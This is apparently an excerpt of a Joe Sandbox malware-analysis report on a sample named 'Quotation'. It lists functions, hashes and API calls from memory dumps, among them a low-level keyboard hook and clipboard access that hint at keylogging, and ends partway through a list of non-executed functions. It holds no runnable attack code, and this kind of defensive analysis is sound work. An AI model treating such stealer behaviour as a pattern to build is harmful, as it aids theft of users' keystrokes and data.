Instruction Fuzzy Hash: 26718A74B043048FDB08DB79DC507AEBBE2AF88340F108569D405AB395EBB5ED82CB90

Function 00158892 Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 001588AA

Memory Dump Source

Source File: 00000009.00000002.2495387457.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_150000_Quotation.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2afec2bb4acc6c9394173437e27d82c4ba20dba8c8cd0fab2354a491c828bee
Instruction ID: cef6016aa38b0ad00d13851e478b5f03b11e5248d6928593ec6ef1daa6c49d00
Opcode Fuzzy Hash: f2afec2bb4acc6c9394173437e27d82c4ba20dba8c8cd0fab2354a491c828bee
Instruction Fuzzy Hash: 55129470700205DFDB29AB38D49225D72A3EBD5342B108E29E415DF346CF75ED4B9B91

Function 38105838 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

$, xrefs: 38105D54

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: f1f52afc3dab423ab39daeb1412eeb30f0bb52d763f4ace2199b9c21223a6a09
Instruction ID: 8289dd2430c3787433c77901cec62e32c8458da47bda0d7db5d568394a1824f6
Opcode Fuzzy Hash: f1f52afc3dab423ab39daeb1412eeb30f0bb52d763f4ace2199b9c21223a6a09
Instruction Fuzzy Hash: 2FE1A0B5E002148FDB14DBA8C8506DEBBB2FF89320F15856AD845BB359DB719D42CFA0

Function 385E5CBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 385E7029

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1018dc099b8ccba49e959bc5c857c71c5c81a0bd6be2684cb7a27a67ab5e8c85
Instruction ID: c82a2e391af90d80115d2ff5e5a8edfbb58cb88c9c0296550cde84a2997b50cf
Opcode Fuzzy Hash: 1018dc099b8ccba49e959bc5c857c71c5c81a0bd6be2684cb7a27a67ab5e8c85
Instruction Fuzzy Hash: A1411AB9900305DFDB14CF99C888A9ABBF5FF88314F24C859E518A7321D775A941CFA1

Function 385E7CA4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 385E7D38

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: ff9793900c71a3d3a3db133a2da3229a0d17304034fa1c19c3320b76acdd5fcc
Instruction ID: efe0eb022b17329b2fe32ffcf66467a19bf3c559ea4d24d9f13a144415f643c3
Opcode Fuzzy Hash: ff9793900c71a3d3a3db133a2da3229a0d17304034fa1c19c3320b76acdd5fcc
Instruction Fuzzy Hash: 223102B4D01348DFEB10CFA9D984BDDBBF1AF48304F2484A9E444AB290DBB4A845CF51

Function 00151388 Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0015143B

Memory Dump Source

Source File: 00000009.00000002.2495387457.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_150000_Quotation.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d716d246f11851cbab20706b28d8e8a30da788edaab818ac46bfbeb5c1f9481e
Instruction ID: 46d085b8c3d44bed1f50e54fa4249b49b23f2b330da9cef13c057ab840b8f4fe
Opcode Fuzzy Hash: d716d246f11851cbab20706b28d8e8a30da788edaab818ac46bfbeb5c1f9481e
Instruction Fuzzy Hash: 6D21E430A00200EBEF3A5734D88837D3665E752327F04282AED16CF790DB289DC9C792

Function 385E7CB0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 385E7D38

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 0cbd59d47a3b37197728f35b3854885ca593273be046eb9b94684d60d2b6285a
Instruction ID: e0db665b39ce46bbc50eb051ff1b4d2886ef42d922be871deb84e6162fa7c037
Opcode Fuzzy Hash: 0cbd59d47a3b37197728f35b3854885ca593273be046eb9b94684d60d2b6285a
Instruction Fuzzy Hash: 6531F1B0D01308DFDB14CFA9C984BDEBBF5BF48314F2480A9E404AB290DBB4A845CB65

Function 385E60D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 385E6157

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8bb0b893cb8f0e287108b013f515cd1b1679c257a9d5d643271568c0fb61602f
Instruction ID: f4e63212b7c99505f83f439448b9709b53f5c8bc84435524e2e350d80d75a8cd
Opcode Fuzzy Hash: 8bb0b893cb8f0e287108b013f515cd1b1679c257a9d5d643271568c0fb61602f
Instruction Fuzzy Hash: DB21C4B5D012499FDB10CFAAD984ADEFBF4EB48320F14841AE958A3350D774A950CF65

Function 385E97F2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,00000000), ref: 385E986B

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6d74121ca7b2270749f185a8672da0fc446113ff4f8cc749532a312ff4b623d9
Instruction ID: 4e33714f2b53ae0fbd5b650a063630b67bbaf4b14eafc4ac71e634f7bcf4b691
Opcode Fuzzy Hash: 6d74121ca7b2270749f185a8672da0fc446113ff4f8cc749532a312ff4b623d9
Instruction Fuzzy Hash: 5721F4B5D002499FDB14CFAAD944BEEBBF5BF88310F10852AE459A7250CB74A941CFA1

Function 385E7298 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 385E72FF

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a2fbd838e4bccf3f2681685c62109702be52e3b7274508be1586a08f0f67e6b1
Instruction ID: 7ded2694af3d3a6dd1982c3223e15b678d5c085072185532ea49fe529092ced6
Opcode Fuzzy Hash: a2fbd838e4bccf3f2681685c62109702be52e3b7274508be1586a08f0f67e6b1
Instruction Fuzzy Hash: 031133B5C003498FDB20CFAAD845BEEFBF0AB48320F20841AD919A7251C375A940CFA0

Function 385E7B66 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 385E7BBD

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bc05b863b8640a6f1507c72fc766f41418b1fbd5ecb5bdc5f07759780e630823
Instruction ID: d5294390b1fde645379cef36739fe71a955332d693c1d27837c1e561a096e250
Opcode Fuzzy Hash: bc05b863b8640a6f1507c72fc766f41418b1fbd5ecb5bdc5f07759780e630823
Instruction Fuzzy Hash: B11112B5C003488FDB20DFAAD945BEEBBF4AB48320F20845AD559A3610D379A944CFA5

Function 385E7B68 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 385E7BBD

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 03ebe23eb24dc15ba61f7b8790e8fe616dc9c6910af5a6bc7de06324d112dca2
Instruction ID: 398aa0d11ef49b6fc6923c67e14544be6c574fb81b4772605cc2d98161768cf5
Opcode Fuzzy Hash: 03ebe23eb24dc15ba61f7b8790e8fe616dc9c6910af5a6bc7de06324d112dca2
Instruction Fuzzy Hash: 871112B5C003488FCB20DFAAD845BDEBBF8EB48320F208419D558A3200D778A940CFA5

Function 385E72A0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 385E72FF

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: bb5938cb60c3e56fb894b564c24afa5f1c83201a952ada532e56669f09084e33
Instruction ID: f667ca70b09f6c87cacb8859660b2792780872712dd529e12708a02970de19dd
Opcode Fuzzy Hash: bb5938cb60c3e56fb894b564c24afa5f1c83201a952ada532e56669f09084e33
Instruction Fuzzy Hash: CE11E2B5C003498FDB20DF9AD945BDEFBF4EB48324F20841AD918A7250D775A944CFA5

Function 381021AB Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PHq, xrefs: 381022FB

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 1b86b40e069b80be149ec6d4df282124335bdbebee337449cee07b749d2cb35b
Instruction ID: bd16b9306cdd38ff9b34425d0534b3bff17b851cd9b0f5d2dfea79846aa7e92c
Opcode Fuzzy Hash: 1b86b40e069b80be149ec6d4df282124335bdbebee337449cee07b749d2cb35b
Instruction Fuzzy Hash: B641E274B002058FEB1AAB78C86469EBBE3AF89740F204579D416DB351DF35DD02CBA5

Function 381021C0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

PHq, xrefs: 381022FB

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: a6b9da0db81d24204c65d62812c7b5cb0426d307a0cad7022616372ab30a244d
Instruction ID: e1d16ff788b469c30b69a4fc64f61a55b0e7d586c8dd005eb42d96f9ce97c2c1
Opcode Fuzzy Hash: a6b9da0db81d24204c65d62812c7b5cb0426d307a0cad7022616372ab30a244d
Instruction Fuzzy Hash: AC31C174B002058FEB19ABB8C8647AFBBA3AF88340F204569D416DB355DF35DD42CBA5

Function 38104D38 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

XPq, xrefs: 38104D3D

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: XPq
API String ID: 0-1601936878
Opcode ID: 78f3a2cb763dc521465a183169cf79940b18ace102d0555ecff5922a181a178e
Instruction ID: a1ce6085a090cbbe17b035de2e68d8b994fb00310d8c76c06acda4bbdf652d64
Opcode Fuzzy Hash: 78f3a2cb763dc521465a183169cf79940b18ace102d0555ecff5922a181a178e
Instruction Fuzzy Hash: B7016D70A002099FDB159BA988257ADBAB2FF88304F20851EE801A7392CF390E06DF51

Function 38106DFD Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd3b9a34318dff5e6638ab235a147f141dc61ae187845eece0a548e0bbcbcf1
Instruction ID: 5c0f7a4c755ac28f6a959a7ed32ee61041c41d634abee814d7f0f8a3164f6f77
Opcode Fuzzy Hash: 1dd3b9a34318dff5e6638ab235a147f141dc61ae187845eece0a548e0bbcbcf1
Instruction Fuzzy Hash: E3A17875A00308CFEB14DB68C944B5EBBF2EF85315F248969E449AB255DB36EC42CF90

Function 3810628F Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b44d10884efea627e0b2619e830b22ed3c1bb301097dd2266e53ba0e92247e
Instruction ID: fa2b450f998ada1da87389a71e5bad24a2bb18f98bccf2934af0a7af9e3b7e06
Opcode Fuzzy Hash: f5b44d10884efea627e0b2619e830b22ed3c1bb301097dd2266e53ba0e92247e
Instruction Fuzzy Hash: BC6194B5F002208BDB149A7DCC5069EBAD7AF94210F194439D80EEB364DEA5ED428BD6

Function 38104348 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46233a70332f9d0747a2fee80feb344eb5bc3aa3a44141f23718eefe41c394c8
Instruction ID: 4ac804c6517a90ea40f05fc39f53c00762569c70bf079faadc781b286ee7089a
Opcode Fuzzy Hash: 46233a70332f9d0747a2fee80feb344eb5bc3aa3a44141f23718eefe41c394c8
Instruction Fuzzy Hash: B7814E74B002099FDB48DBB9C8A175EBBB3AF89304F108568D509EB355EF34DD429B91

Function 38104358 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45866600d781b5985eb6c37fdddae7943d7e8ea092915086e0497821132f79c6
Instruction ID: 6bc2535096287554ae24f8d23c6ebf1fdcaf7d514f842a1e18443eb72ca25bdf
Opcode Fuzzy Hash: 45866600d781b5985eb6c37fdddae7943d7e8ea092915086e0497821132f79c6
Instruction Fuzzy Hash: 02813D74B002099FDB48DBA9C8A175EBBB3AF89304F108528D50AEB354EF74DD429B91

Function 3810471F Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b45dae3668d3b2369e700037a026d7f4296f9de8942b592fc30ea3a48879eef
Instruction ID: 4226ab0c62b6c77353107ab150d7f9998f873972a9b1439ad4ffc37da3f09f5d
Opcode Fuzzy Hash: 8b45dae3668d3b2369e700037a026d7f4296f9de8942b592fc30ea3a48879eef
Instruction Fuzzy Hash: 6E812E74E00619CBEB10DFA8C880B9DB7B1FF89314F208699D549BB255EB70AA85CF50

Function 381056EF Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edbeeacfe8b1ee7af96ea9c2916f5eaab678009e24964d0373c2c5c6fc114ac
Instruction ID: 366dd8952c73810294cfee501a244f382b60ff2f83303a66dea8c2abac045ba9
Opcode Fuzzy Hash: 6edbeeacfe8b1ee7af96ea9c2916f5eaab678009e24964d0373c2c5c6fc114ac
Instruction Fuzzy Hash: 4951F5F8E04244CFEB118A6CCC8079ABB72EB45314F64896AD459EB28AC735D841DF71

Function 381054C8 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3d244a3b6a4196c17f3c1b66ec95491188d3e4b3c8e2fd8b2037f5bd448012
Instruction ID: 101d76f89f1a5e41fecf9c9a8bcf1810bcc1f23d744399beba417536c072f8e2
Opcode Fuzzy Hash: 6e3d244a3b6a4196c17f3c1b66ec95491188d3e4b3c8e2fd8b2037f5bd448012
Instruction Fuzzy Hash: AF413DB5E00609CFEB20CE99D881AEFF7B2FB84350F10492AE156E7654D731E9458FA0

Function 38102071 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e91706d2cbf0823af2c2dbf0787e4c560c751eb167f31c9fd69085dc399a331
Instruction ID: 606ddb92c2424e600ccf62db274c79ed12e45f77948bf8d6c2edd24eae885e6d
Opcode Fuzzy Hash: 2e91706d2cbf0823af2c2dbf0787e4c560c751eb167f31c9fd69085dc399a331
Instruction Fuzzy Hash: 16314975A00705DFDB09CF78C89468EBBB2BF89300F108A19E816AB250DB71AC46CF50

Function 38102080 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb13053a6fe262253f9511e4e93e5016ccfb4b457d3f3d3f866ec7a6625b1a1
Instruction ID: 264bc86662500bbb08f5b9c4bbb4d54506d7533a1493e889b487b0e1990f1685
Opcode Fuzzy Hash: 1fb13053a6fe262253f9511e4e93e5016ccfb4b457d3f3d3f866ec7a6625b1a1
Instruction Fuzzy Hash: B3311974E00709EBDB09CF79C895A9EF7B2BF89300F108919E916AB354DB71AC468B50

Function 38103B48 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ec831f42b4e3b74018c0dad5db04a5478f04dbb4c7030b173eeecef8fe4494
Instruction ID: a0942e03e0207e962bd77e6e939c57ca2c3aa3b59ec70636ca05b51765fb4b50
Opcode Fuzzy Hash: 67ec831f42b4e3b74018c0dad5db04a5478f04dbb4c7030b173eeecef8fe4494
Instruction Fuzzy Hash: F4219C75A003059FEB05CF69C841A9EBBF6BF88310F10812AE904EB360DB35D881CBA1

Function 38103B58 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c035289610e992f7d6b9d605490d0743d96d2dda174301860c301ec63018423d
Instruction ID: fecd03135af9e985060c8c61bcd3ca01766405c0c56a2e058bb2c6198d988f20
Opcode Fuzzy Hash: c035289610e992f7d6b9d605490d0743d96d2dda174301860c301ec63018423d
Instruction Fuzzy Hash: D8213D75A002159FDB04CF69C991A9EBBF5FB88310F108125E905E7350EB35DD41CFA5

Function 000AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2494916427.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ad000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243d7f46ba8b79c793e3052b3fca75c98ed1a8b6b5a1ae34c39d9884b3b5435f
Instruction ID: ca79c51f973292237e9ec85c4c3776e4acd6ba6dbbfce2d92cfedc1fe6eef9fb
Opcode Fuzzy Hash: 243d7f46ba8b79c793e3052b3fca75c98ed1a8b6b5a1ae34c39d9884b3b5435f
Instruction Fuzzy Hash: 5721F575604204AFDB24DF60D9C4F16BBA1FB85314F24C66EE94A4F642C736D847CA62

Function 381054C0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121d304eff125009703c9ccef48d1552535bb832e9b52a410b7fb1b9a06126b5
Instruction ID: 59144e71a26b6b203a3f367592107815eadf89473c39e2edb1f387d3c5863c9a
Opcode Fuzzy Hash: 121d304eff125009703c9ccef48d1552535bb832e9b52a410b7fb1b9a06126b5
Instruction Fuzzy Hash: B4215675E007059FDB20DEA9DCC4AEFB7B2FB84310F104929E156A7554D734A846CF90

Function 38103C68 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46a74d245ea33809aaef1a1f30069558785a423255abd5f49c14d3b8d5ff8b1
Instruction ID: 45b81d511ffc85f50dd7911ea125d1dcb5fd6f5c4fb9c91aaf68278f563c3e68
Opcode Fuzzy Hash: c46a74d245ea33809aaef1a1f30069558785a423255abd5f49c14d3b8d5ff8b1
Instruction Fuzzy Hash: C8118E35B002289FDB589A6DCC2469F77AAABC8350F10853AD405EB344DE35DD028BA1

Function 38103921 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e386212d566858f98fd51d945f5af7de65e88a48313d5988973af68642c93c8e
Instruction ID: 33ca99f9b63fe776bc2e2c01025c5b8b05f195f9166d356c1f1c968feaf245bd
Opcode Fuzzy Hash: e386212d566858f98fd51d945f5af7de65e88a48313d5988973af68642c93c8e
Instruction Fuzzy Hash: 7A21F2B5D00259AFCB10CF9AD984ADEFBB4FB48310F50822AE918A7240C3746950CFA5

Function 38103C57 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030365f6791e9d705d6ee9c8bc3285d3ffaf91488b9f00aad4f31d180a2ea5fe
Instruction ID: 0ab0964f2e11fe62077dcf3efe41669924b6a4939fa991104538731b1d5740f8
Opcode Fuzzy Hash: 030365f6791e9d705d6ee9c8bc3285d3ffaf91488b9f00aad4f31d180a2ea5fe
Instruction Fuzzy Hash: 8001F5767001945BDB45967D9C342DF7FABABC9310F04407AD505EB240DB248D02CBA2

Function 38103928 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b82fcaab6d6c79015f585aa8a1bc1d12ad47002df3299b8449c248b56eac51
Instruction ID: 99a24918617968dbb85f465b7197762a6f4af106155ed22dbb5d15955769e8d4
Opcode Fuzzy Hash: 07b82fcaab6d6c79015f585aa8a1bc1d12ad47002df3299b8449c248b56eac51
Instruction Fuzzy Hash: FB11E4B5D01219AFCB10CF9AD984ADEFBB4FB48310F50812AE918A7340C3746954CFA5

Function 381042CA Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66902313466fa82fd2028ff16ef587aeac05afb02cb3c0f3b9ec89afd276f757
Instruction ID: 0d867cabcfa2af2896c221df1cb42b053b51168880eb281d80ec9135b33404b2
Opcode Fuzzy Hash: 66902313466fa82fd2028ff16ef587aeac05afb02cb3c0f3b9ec89afd276f757
Instruction Fuzzy Hash: B2F0C278B002108FEB10926ED4A170EA2D6DBC8315F10C93AF10ECB345DA25DD434B95

Function 3810651F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e26e514d73c089879c07f579590fe5e6ce87b0299d03730d0c20bc1ba2adce
Instruction ID: d5e4c6befffd8c3a2143a4adf083a573c3b5d7c06cd5ddb3832723c21bd47376
Opcode Fuzzy Hash: d7e26e514d73c089879c07f579590fe5e6ce87b0299d03730d0c20bc1ba2adce
Instruction Fuzzy Hash: CBE048B5A54384AAEF00DFB49D4474D7BB9DB46248F6189E6D449CB101D271CA418B50

Function 38106528 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2149c8404fdb3d378cb6846175523c8f02b307357daa6c7fb311a4fbcfcf5a
Instruction ID: 80a839c1b846100bea398ec727382811e43cd92bddfe590d5dff40ea79a499f6
Opcode Fuzzy Hash: 8c2149c8404fdb3d378cb6846175523c8f02b307357daa6c7fb311a4fbcfcf5a
Instruction Fuzzy Hash: E4E012B5B14208EBEF00CEB8CD4574E77ADEB46298F6085A5D449D7205E676DA028B90

Non-executed Functions

Function 004036DA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
NSIS Error, xrefs: 00403840
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9

Memory Dump Source

